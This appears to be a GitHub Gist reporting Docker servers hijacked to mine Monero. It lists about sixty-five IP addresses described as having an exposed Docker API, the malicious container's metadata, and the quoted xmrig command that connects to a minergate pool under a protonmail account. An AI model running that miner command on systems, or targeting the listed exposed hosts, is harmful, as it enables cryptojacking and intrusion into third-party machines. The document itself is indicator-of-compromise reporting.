Instantly share code, notes, and snippets.

Embed
What would you like to do?
Hijacked XMR Docker Servers

Hijacked Systems

All the following IPs have the docker API exposed and have been hijacked to mine XMR

101.132.125.134
101.251.243.178
101.255.124.125
101.89.134.211
110.87.27.14
114.116.95.37
117.68.155.0
118.24.67.166
119.123.179.148
119.28.84.69
119.29.25.238
120.55.60.63
120.78.161.231
122.112.211.221
122.130.156.202
122.130.162.88
130.61.37.213
13.126.251.47
13.127.225.86
132.232.136.141
132.232.89.207
138.197.178.7
142.44.136.43
142.93.58.171
159.89.214.243
18.191.227.117
18.216.162.54
18.219.135.89
182.61.18.126
193.112.82.34
198.181.44.229
206.189.172.84
34.219.234.223
34.241.123.235
34.241.26.75
34.243.229.106
35.196.240.112
36.111.35.106
37.123.179.67
40.113.227.30
40.85.221.142
45.115.236.2
45.79.90.143
46.238.43.38
49.4.88.169
52.221.217.38
52.221.254.168
52.55.245.50
52.66.50.254
52.76.241.217
52.83.226.113
52.83.231.122
52.83.255.247
52.87.113.76
54.145.128.254
54.175.91.189
54.183.234.49
54.191.252.227
54.200.143.122
54.202.26.218
54.223.241.195
54.66.165.97
66.226.76.221
68.168.131.140
81.226.150.217

Docker Image

All appear to have a the following image and command line.

{
        "Status": "Up 20 hours", 
        "Created": 1536506330, 
        "Image": "tmpdocker/xmr", 
        "Labels": {}, 
        "NetworkSettings": {
            "Networks": {
                "bridge": {
                    "NetworkID": "REDACTED", 
                    "MacAddress": "REDACTED", 
                    "GlobalIPv6PrefixLen": 0, 
                    "Links": null, 
                    "GlobalIPv6Address": "", 
                    "IPv6Gateway": "", 
                    "DriverOpts": null, 
                    "IPAMConfig": null, 
                    "EndpointID": "REDACTED", 
                    "IPPrefixLen": 16, 
                    "IPAddress": "172.17.0.3", 
                    "Gateway": "172.17.0.1", 
                    "Aliases": null
                }
            }
        }, 
        "HostConfig": {
            "NetworkMode": "default"
        }, 
        "ImageID": "sha256:96f015c729696b0fe40d4c12710990be310543c51a77f7e4150edc0a6bd3158e", 
        "State": "running", 
        "Command": "./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u tmp456789@protonmail.com -p x --safe -k", 
        "Names": [
            "/clever_lovelace"
        ], 
        "Mounts": [], 
        "Id": "c0c4149d65341041d8c4b6577b24669e4bf74dcb0e327d12157ad5564ee2e792", 
        "Ports": []
    }, 
    
    

Miner Pool Details

All appear to have the same protonmail email address used for the miner pool

 tmp456789@protonmail.com connecting to stratum+tcp://xmr.pool.minergate.com:45700 
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment